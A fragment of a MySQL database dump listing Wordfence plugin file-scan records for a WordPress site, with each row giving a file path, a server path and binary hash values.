('ºWMíŠË{h©øÚÀ(ž', 'wp-content/plugins/wordfence/lib/menu_options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'U’fMBåzà¥=sÁ†®by', 'ËÕì²—äæ±è8þ1»â©¯Ø*{”ï*ä$', '', 0, '?'),
('z¨‹ß8 Lò{ŸÓõq', 'wp-content/plugins/wordfence/lib/menu_scanner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì8¼)´ü‘Õ‹dàJ¤', '¸Æ.Ù”Geßâ!VŒ*¤Ef2PÏ?`ä÷‰fq‘ÄP', '', 0, '?'),
('ŸI|›K9Õ(Ô{sõX', 'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner_credentials.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒ».¼ I\05×AŒŠDä<', 'Ê…<;Ò¨ÿè &IÖ˜^ÇdD(ÇÇeXö;Î;{¼°„', '', 0, '?'),
('OåëÏÌåHI!K!0[Ú', 'wp-content/plugins/wordfence/lib/menu_scanner_options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_scanner_options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dr¯ðmQ?NØ¯ÿEÂ', '¦0²°z¡!_N\\‘Ã—¿›‹\n––Á~NÅ|‰§dsðm', '', 0, '?'),
('-jÞ§« š Íæ¦~hyb', 'wp-content/plugins/wordfence/lib/menu_support.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_support.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'A„ZÉÃ¥3¸êÓ¹1v*”', '+Y€«©¼Ü£W>êýüóÏAä|ˆ\r¢‚<wŒ!îôS"dO', '', 0, '?'),
('o÷jù‹É»yæ©V', 'wp-content/plugins/wordfence/lib/menu_tools.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à6Ë‹ÐRCåÖ[A', '^¡<ž°øÊû×E»Qä˜aìãç–Ë eù–M º~|', '', 0, '?'),
('!§##sw:\rH*²$qô', 'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï?(ÚHÄ''Éš`ìtj', 'ÃÎ„\Z}eZdÜ-90>2Ç2—õÊ(Ó»Yœ¢ÿ®­ó', '', 0, '?'),
('!ëùTÛ¦œíÖî	lÂI˜\n', 'wp-content/plugins/wordfence/lib/menu_tools_importExport.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_importExport.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É³Òïxm46c)åµÙ', 'en¿*ž­×~íÀa¶ÙŠc]ç¤ØZbiêžXCqˆœ', '', 0, '?'),
('UI‚_•ÑËêYm«çÑ_', 'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'PvýBiÿûƒ²Y_Ÿ»', 'Âö†z\0H$yD7ùéßæs»{ŒÞw5² âÆ¹’', '', 0, '?'),
('@ØL½Öß¯7»Ù­kÙ‚E', 'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`3‹ñ0®h~¦Ý»ÙéÐh', 'àZR''ÃÿéZüwµ$ßƒÕÉ_ÉxTê{-`¿Ç', '', 0, '?'),
('CúØs\\§\nò–àÚsŽÕ''m', 'wp-content/plugins/wordfence/lib/menu_tools_whois.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_tools_whois.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*5µD›O7ZÀY¹Ô%†', '¤Äx.ç¨.î$Ã´³(ÚEÏ·¨XŸªë	ÝóçQÐ', '', 0, '?'),
('7"¿ó®å¦¿W–\rŠÄÑ½Í', 'wp-content/plugins/wordfence/lib/menu_wordfence_central.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_wordfence_central.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡ÖQÔ˜"ÀdßfÛn ú', 'í<O9ÝorŒEÏw´aä‘ëoÎf§ˆ‰ª·øÀrƒs', '', 0, '?'),
('@¿È¯îÎ&Oñoœ‡î', 'wp-content/plugins/wordfence/lib/noc1.key', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/noc1.key', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9e¤b\0æÆPOŠÁ¾…”', '_Ëu‘öájëÇý‚ÆúPþþ-KOAƒÜ«œ¦ÛÖÓ', '', 0, '?'),
('kÂ“»›U/‘^ÞîÞð ', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9„ä0@û³òîÅeÜv', '‚BZâExÜ¥+ÉD`”šƒ«H,C UdoÅLÌu[', '', 0, '?'),
('ÞHCý™¶âôÐ)ªCÍ', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üêyëÚKÁæ\nÈuˆ@Ðx', 'AÝ¶ºÝ;_|sÏÈ¤4ÍÔ_×)zµaKÇQ¾Ee!©º', '', 0, '?'),
('ž£e-¨ÒRÈ‰”®ùL:Ñ', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qÛÙ×znØ¹z˜¥¿ƒ', ',rêÚPQ"q2`é¦C3Á&\ZË€gˆZ^£6', '', 0, '?'),
('ºŠi/ŠpEtðµ\nÝ÷lø', 'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´ÿràÉš0mb74$', 'ï{hõ¹D¨ôXò^µw¯š®6D‡fcÄ@Q‘Õ\rüf', '', 0, '?'),
('&McÝñE–å\\îD«Kt', 'wp-content/plugins/wordfence/lib/sodium_compat_fast.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/sodium_compat_fast.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd<‡{¹Þ¼ý\nñ]¦q…Y', 'ïÂ$§/H¶pVª8Cï÷¥.»ïz¬Ÿùb¸”`Cô’', '', 0, '?'),
('£ÜF¦²™˜{ì´ýA', 'wp-content/plugins/wordfence/lib/sysinfo.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/sysinfo.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ® ¹ã †ó/«‡ßÚ³E', 'ùMGt¹\r=ÞðÑ¼Ã)#Iz9×øÞÕ=¸ŒÁ`Q{k', '', 0, '?'),
('LR7Q¼äToG|Ä{', 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/viewFullActivityLog.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#\\™œF\rêv›Cõ', 'óƒ’X¹74ñù¦u\rt{½œMl×„‰¥qT}Ôêð¼', '', 0, '?'),
('ÁÙµ\nh¶ÍJxµdvÏÔƒ]', 'wp-content/plugins/wordfence/lib/wf503.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wf503.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š_*"LƒX\09zRÌä', '=æz:4©ãmsÊÇFyÈFÐ‰OîÜ²Ó¼nÜ)', '', 0, '?'),
('¾á2]hqu:ÞT6EÑU¶', 'wp-content/plugins/wordfence/lib/wfAPI.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfAPI.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ls¸º,è¼ÔTO2üøN³', 'Û…2¢|^þsn=)ÄåÄM{Äè(Ú[¦³sæ­LQØÀ', '', 0, '?'),
('É†8¨ÂÖÀpÅ»ÑµVý', 'wp-content/plugins/wordfence/lib/wfActivityReport.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfActivityReport.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«…ôþ/}ÏéUìG+ïì', '''o–w”,X^Èxšµ¯(˜ˆ•*ÎÝåÃ/ƒT?Œaµ', '', 0, '?'),
('zo¸†Ü²ˆ~¡áˆb', 'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&ë’5”éuNiÍÎ!Åz', '€ÔéÎ#…ËÈÉ›!wƒcwØƒ}6¢Ùó‚~A§’ó', '', 0, '?'),
('NiÅ~	Õ`øà®W°E', 'wp-content/plugins/wordfence/lib/wfAlerts.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfAlerts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™Kù(A¬ž|ŠÏ¯y±ðL', 'ô ''_Œ;?á|US5d}K/+,I!|Åà®t', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('ÞÞ‹³­”1FóøëÛa“', 'wp-content/plugins/wordfence/lib/wfArray.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfArray.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜§ÂršzTªG‰ë~SJ­D', '8sn¢b¹AÞº Ù.¼›Îrì0z©„!ñ÷àN<€sA', '', 0, '?'),
('ê-=Q°CwàtnLà¡#', 'wp-content/plugins/wordfence/lib/wfBrowscap.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfBrowscap.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žC’"ã+5³Å¸£ÏÁH', '²,o¯vÃÏéUÚõ(wd±ÏÏ¨– ˆþÞOÀHÜ', '', 0, '?'),
('«ÐèX’°ØJ üp', 'wp-content/plugins/wordfence/lib/wfBrowscapCache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfBrowscapCache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'TÁëÏQ×x‡j‚', 'Ðƒ®žë1Y„„õTšŠÐˆÕqó¤W6Ý‹™Õh	', '', 0, '?'),
('äê¿1þ]ÃM|®KÔFZ', 'wp-content/plugins/wordfence/lib/wfBulkCountries.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfBulkCountries.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°±ü¥;]àMTé®Œª=', '¿B$	Û(–ZŒ„ê-¡SX?Záñ} 2Çk(25ä', '', 0, '?'),
('¸œÒ‘-èÌôŠ\rŠ{,ï', 'wp-content/plugins/wordfence/lib/wfCache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥Ù†‡ÁaÜAg5ZS"©¶', 'ÉÿêDg]<’M*"L²Öï•E˜jäöN8Ã/d÷\na„', '', 0, '?'),
('·“hJ–´DÒã°—G¥ ön', 'wp-content/plugins/wordfence/lib/wfCentralAPI.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCentralAPI.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm]3_¢’×ÃˆÛØ ŸßŒ', '»2fÙ^~@…´C“‡sÄ±±€žÝcOú×¢ŠYEÇ', '', 0, '?'),
('Z4<n?e˜ñ²', 'wp-content/plugins/wordfence/lib/wfConfig.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfConfig.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`*Ùô‡çº¤0œUœþ4S', 'Wœñ"Ûx¤o8RƒÊ:éþO¾ÄAeLGHá^¥Òú', '', 0, '?'),
('8Ã›ZE‘Q$}UPöT£à', 'wp-content/plugins/wordfence/lib/wfCrawl.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCrawl.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ1Ìé“‡®Ü™~Ò\rüm', '%&¹ã9‹	/D÷XGûØžØß‡ƒâUä»ïâê€4', '', 0, '?'),
('°¶Ú¥±^iç$âýå&', 'wp-content/plugins/wordfence/lib/wfCredentialsController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCredentialsController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'îZ Ë\0ˆ°”®Õ«w6Ž', '7¯6¥ay¨5”?}%.]ÚÇûëÂØžuÏ«S¼', '', 0, '?'),
('Øx¼øÎ²Ð¦¬à¨A	Š<ê', 'wp-content/plugins/wordfence/lib/wfCrypt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCrypt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CøR`¨œ¾éÄ9|‹e', 'U ÍŠŸs›ôdsÕ9;ä°ÀC¿Oô†ûòÈ¤‰@', '', 0, '?'),
('CåÍ(¤LC*RÎŸÎ\0', 'wp-content/plugins/wordfence/lib/wfCurlInterceptor.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfCurlInterceptor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FHim¡Ñ{X{bÈ¤ÇÜL', '\\ŽOÛåqŽóL{ ©3¨<‘ÈK£9û€\nÏï=', '', 0, '?'),
('ÙJàïš^\Z7ü•uG–k+', 'wp-content/plugins/wordfence/lib/wfDB.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDB.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿–K?FÖc»2‚òÚÅî', 'íþªÓaæÉ¦áõT¸­ëHŸÌ6QáM{ª+²¨‡Ï¤}z¶', '', 0, '?'),
('iŠíÇkmCxþÊ·Ëòù', 'wp-content/plugins/wordfence/lib/wfDashboard.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDashboard.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'e‰É.×q¿:óü—jßíR', 'u¨aÆvÜR°û +We\rÿT†J%˜"Â\r7¤f»™Ï', '', 0, '?'),
('7r‘§uFñ˜±@J,', 'wp-content/plugins/wordfence/lib/wfDateLocalization.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDateLocalization.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬MZU¢×U…Ežª£{ó', 'þ®}¾ËòÐXÿê)89¦Õã»[—4\\!H"Êï\\}ø', '', 0, '?'),
('yìem$ÍùJõœºÓS', 'wp-content/plugins/wordfence/lib/wfDeactivationOption.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDeactivationOption.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬	}?ÓþÉ Òð€¶5', 'Œ''ˆòÖzg/‚Ù½n+u×ÍÁF=Û[†È\ZlÍ', '', 0, '?'),
('l9é¹=¯ühÇ,>ÙÃç&', 'wp-content/plugins/wordfence/lib/wfDiagnostic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDiagnostic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'úeŠÎóÚ•«…/7³m½s', '¸z$ÛÄ‚p*…ÇQFÇHsöq,DWŸ9ìª9“ìŸ<¿²', '', 0, '?'),
('õF¤ë\ZÁ“ç®Cüì1®P', 'wp-content/plugins/wordfence/lib/wfDict.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDict.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'yß LüêïZ!bE±ÔlÚ', 'óµÊ.{0JeúÂ{×5-Æòì~[Tš$Äž', '', 0, '?'),
('ºíÌA0fŽýf`Â KÇ}', 'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfDirectoryIterator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\n+Z/_¬\Zxuæv', '¢Èu‘úü;IV—•a[¯~ãµ­þTZ\\^àyJ¬j', '', 0, '?'),
('”‚¾XÆá'';yÿÅî±fF', 'wp-content/plugins/wordfence/lib/wfFileUtils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfFileUtils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“1¡›}o!8|ëO''¥è®', 'jc¥°OÿRo½´x·¾ó&#A\\!ÇŒÇÐ ½,2«Ì–r', '', 0, '?'),
('q¾†5@£*=õ&´æ\\Xá', 'wp-content/plugins/wordfence/lib/wfHelperBin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfHelperBin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';ï×!·ÈËÉ4QÕÞX#', '’—Õ¹%-ø^ê…qƒâUÊqàMéÒeY“êð', '', 0, '?'),
('PÆMî\ZÖIÌ¸Ý­Y`r', 'wp-content/plugins/wordfence/lib/wfHelperString.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfHelperString.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×EuÆ»\\S w?,Ý_™L`', '£Îñ Ÿ¶iÂLÆ›wµÆÖ6É_§¾ç,n—2S£äZh)', '', 0, '?'),
('iákìñ­½CñíT,ì', 'wp-content/plugins/wordfence/lib/wfIPWhitelist.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfIPWhitelist.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2¥h‰Û2aEÒ™0', '©Dê:ä]è¸z°ÙÐÂýw%[‹jÌo†ÐÝûŽX`×û', '', 0, '?'),
('Œ1ÁêÏ£×é I¤', 'wp-content/plugins/wordfence/lib/wfImportExportController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfImportExportController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý´öû­««¶±ò+>±ÿ', '½dlÑ‹Û¹`á°Ù…Ìç÷¦ ¸Jû÷–#|i{£', '', 0, '?'),
('÷µeU¯‘RÏ´Èôõ˜°ï', 'wp-content/plugins/wordfence/lib/wfInaccessibleDirectoryException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfInaccessibleDirectoryException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3hZÂ-åÛÍp{À°Ä|', 'ÃèàÓsÊ¸l´ã¥\n~’¼f‚ŽŒ!te×O[Õ€', '', 0, '?'),
('¶mvˆyayTÂÇ«"', 'wp-content/plugins/wordfence/lib/wfInvalidPathException.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfInvalidPathException.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Üj“‹ìÃ´Ù¶¤¹Ê', 'ÑØG!ëž‰žöU6H›Ök9J0šÇèOÄ×Çdv!', '', 0, '?'),
('ôÌöV£’åƒsš¢\0œ', 'wp-content/plugins/wordfence/lib/wfIpLocation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfIpLocation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ós+ÐÌ™gÖã³O;*XW', 'Á½ÉjÔš÷6´ƒÄ”-	¿Bõçõ©1–ÁÊ&+Ün', '', 0, '?'),
('4\nö…2­ßµ"E¢ôÿGÃ‰', 'wp-content/plugins/wordfence/lib/wfIpLocator.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfIpLocator.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rr·ÃxB‡{µÁ&&Ë', 'OˆoMÁ¼U-íàÎØŸ\Z²Ôrs„§ôêççOì}°»@', '', 0, '?'),
('Ójs¤žw2ùìp®ýqS', 'wp-content/plugins/wordfence/lib/wfIssues.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfIssues.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µŽ6"rþ&@°œNhæ', '#?˜k->LæÇpk]…uãÛºëxU#}ï…Û', '', 0, '?'),
('(·¹Û>f0\Zg[|¼îå¨', 'wp-content/plugins/wordfence/lib/wfJWT.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfJWT.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»}{ jåN°ˆñcÒK¿', '0mhN`x”x~HŸLjés¦þ°ë€OÇä”PÍÅ,', '', 0, '?'),
('!H±uÿfÉDã7´>=g', 'wp-content/plugins/wordfence/lib/wfLicense.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfLicense.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ª×üOt0LM¢¿¯·{ü', 'ü®,÷Qç¹§^7>“ð;Ùºf\Z¨ÉFÅýªÉYK¹''ó’', '', 0, '?'),
('óŠØ ]Ôf•ˆðPô¢†ƒ', 'wp-content/plugins/wordfence/lib/wfLockedOut.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfLockedOut.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'X3è¹ñðÂŠó°07p§', '½%yC—è¦óäw²2]E*ç@\re–;¤}XÏ.üvã', '', 0, '?'),
('òÚwÎ+"+ú$ã¬^¸', 'wp-content/plugins/wordfence/lib/wfLog.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfLog.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ°ÝÒß{*ÿ!_úöV', 'l·Hs7fÁC.ƒ“¸Ip–:ÊfÄÏÀ\Z6wñ™ÀeúÏ¶', '', 0, '?'),
('¨\\Çýhû RŸXÕ<ºC®', 'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›ëß…—w@L‹åOêÁR', 'àð«´EF‘j©„×r¸Ä;s³ìÎ€.f:ÖáÏ¤ F', '', 0, '?'),
('Ãw:k@DižWQ¾', 'wp-content/plugins/wordfence/lib/wfModuleController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfModuleController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿·oIñÆ·k†ùb', '7.Ý°Ì¿•ò™ÜU¶„ÔL>Ö"ÍTM5±]¿Ú>†', '', 0, '?'),
('ŒtÇ±%˜û£‘µÚF', 'wp-content/plugins/wordfence/lib/wfNotification.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfNotification.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0Ç V2â(ÆÀþdhVD', 'SØaÖàY„íµ‡ýgj+|­ë‘ òáJ²ŒM8³ª', '', 0, '?'),
('é+ê‚3ô»pU', 'wp-content/plugins/wordfence/lib/wfOnboardingController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfOnboardingController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@]¿"‡Ðî‹¼æ’lÜ­r', 'å3KÓôz‡Êñ½öõ\Zo­ëðm…JPFò <6\0', '', 0, '?'),
('ÜÎTÐ¾ÀR§Ÿ²''ï´{', 'wp-content/plugins/wordfence/lib/wfPersistenceController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfPersistenceController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø%ëâkyŠžiÕMO*', 'ò¢ïÿ«ìÏX(¾30\r\nåï\nPEžÌ „› Ž9àöªÈ', '', 0, '?'),
('mÉqPoD0â*ÍØL', 'wp-content/plugins/wordfence/lib/wfRESTAPI.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfRESTAPI.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä\\8÷ÓÃHÁ …miü+', '+›‡+ùÆŸ­íü0Ñû®Í‚b½=þÿ¸[ãœ”¸', '', 0, '?'),
('ïÞŒt+é\\õ+ÆXa†ZU', 'wp-content/plugins/wordfence/lib/wfScan.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScan.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…ZÏ{¼A°Z»(cZK%', 'Åt/ösP¥óâ/Ûc2wŸ«&œq''M5”ÔV‹Öô', '', 0, '?'),
('ïï6X‡Ôª4ñã[_‡=t', 'wp-content/plugins/wordfence/lib/wfScanEngine.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanEngine.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*ô*îR0Å™I6íFâù', '¤³é]J¢BýçdÆ/…Óoj¹ýQîj\Z»C—\\ýN', '', 0, '?'),
('$‰H?.0hØ©íÐ', 'wp-content/plugins/wordfence/lib/wfScanEntrypoint.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanEntrypoint.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®´åÑ+#F%I·Aç®í', 'ý–÷ƒ1MÝÚ|Pˆk@çm_ÀW°ŸvA?ºvzÆ', '', 0, '?'),
('^þÌJödc²¤U+±~Â', 'wp-content/plugins/wordfence/lib/wfScanFile.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanFile.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åüêJË°ë× «Ób>A8', 'KE:yÖÎ~—¥µÚ;Á“õôÙD’¯¥OQÆ­5', '', 0, '?'),
('ÐèúÙ^ž‰ÚGãç”Ý%', 'wp-content/plugins/wordfence/lib/wfScanFileLink.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanFileLink.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2%Ÿá»°åšƒg¿@Îž¨', '„\Zc¨BQ„Šìò¡ïÁåÙVY N–EgI%3<cõ°vX', '', 0, '?'),
('®¸¯{Z€È$Ë''ó‰Q©', 'wp-content/plugins/wordfence/lib/wfScanMonitor.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanMonitor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{BèŸ‘b¡h¿6a\\ÀÝF‡', 'r­‚¡±¶ñÊBVö¸ÑdÎ:*WUŒ2‰ãn/¡', '', 0, '?'),
('Æ·xxß×w]üï3µ', 'wp-content/plugins/wordfence/lib/wfScanPath.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfScanPath.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';YkŒj‹ £RzA$20Ø', 'Œà­¹3¬vQ†Pj‹Åu$$‘÷ešëÜ‹ƒHq©•î‡', '', 0, '?'),
